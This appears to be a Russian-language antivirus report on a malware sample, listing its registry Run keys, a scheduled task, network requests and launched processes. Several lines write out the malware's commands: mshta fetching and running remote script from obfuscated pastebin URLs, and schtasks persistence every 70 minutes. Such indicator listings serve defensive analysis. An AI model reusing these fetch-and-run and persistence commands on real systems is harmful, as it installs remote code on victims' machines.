Техническая информация
Для обеспечения автозапуска и распространения
Модифицирует следующие ключи реестра
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'sgnittes' = '"mshta""https://%40%40%40%40%40%40@pastebin.com\raw\jGJuAL6s"'
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] '' = '"mshta""https://%40%40%40%40%40%40@pastebin.com\raw\hBN1PyKC"'
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'warfed' = '"mshta""https://%40%40%40%40%40%40@pastebin.com\raw\fsK1apdt"'
Создает или изменяет следующие файлы
- <SYSTEM32>\tasks\xestuohtiwfyl
Сетевая активность
TCP
Запросы HTTP GET
- http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt
- http://oc##.#tartssl.com/sub/class2/code/ca/MEMwQTA%2FMD0wOzAJBgUrDgMCGgUABBQSOgrhRCSnWfKxoWTjWxhk8hga9AQU0E4PQJlsuEsZbzsouODjiAc0qrcCAhAV
UDP
- DNS ASK pa###bin.com
- DNS ASK microsoft.com
- DNS ASK oc##.#tartssl.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\schtasks.exe' /create /sc MINUTE /mo 70 /tn "xestuohtiwfyl" /F /tr "\"mshta\"https://%20%20@pastebin.com\raw\D7KH4EKV' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\mshta.exe' https://%40%40%40%40%40%40@pastebin.com\raw\D7KH4EKV
- '<SYSTEM32>\schtasks.exe' /create /sc MINUTE /mo 70 /tn "xestuohtiwfyl" /F /tr "\"mshta\"https://%20%20@pastebin.com\raw\D7KH4EKV
- '<SYSTEM32>\mshta.exe' https://%40%40%40%40%40%40@pastebin.com\raw\fsK1apdt
